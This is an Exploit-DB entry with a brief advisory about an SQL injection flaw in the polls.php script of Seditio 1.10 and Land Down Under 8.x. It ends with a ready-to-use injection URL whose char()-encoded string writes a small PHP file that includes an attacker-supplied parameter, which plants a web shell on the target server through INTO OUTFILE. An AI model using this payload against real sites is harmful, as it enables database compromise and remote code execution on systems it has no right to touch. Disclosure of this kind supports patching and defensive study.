Seditio1.10 / Land Down 8.0 Under - 'polls.php' SQL Injection

EDB-ID:

29202


Author:

ajann

Type:

webapps


Platform:

PHP

Date:

2006-11-30


source: https://www.securityfocus.com/bid/21366/info

Seditio and Land Down Under are prone to an SQL-injection vulnerability because the applications fail to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the applications, access or modify data, or exploit vulnerabilities in the underlying database implementation.

This issue affects Seditio version 1.10 and Land Down Under versions 8.x; other versions may also be vulnerable.

http://www.example.com/polls.php?id='union%20select%200,0,0,0,char(60,63,105,110,99,108,117,100,101,40,36,99,109,100,41,59,63,62)%20from%20sed_users%20INTO%20OUTFILE%20'[path]/.php'/*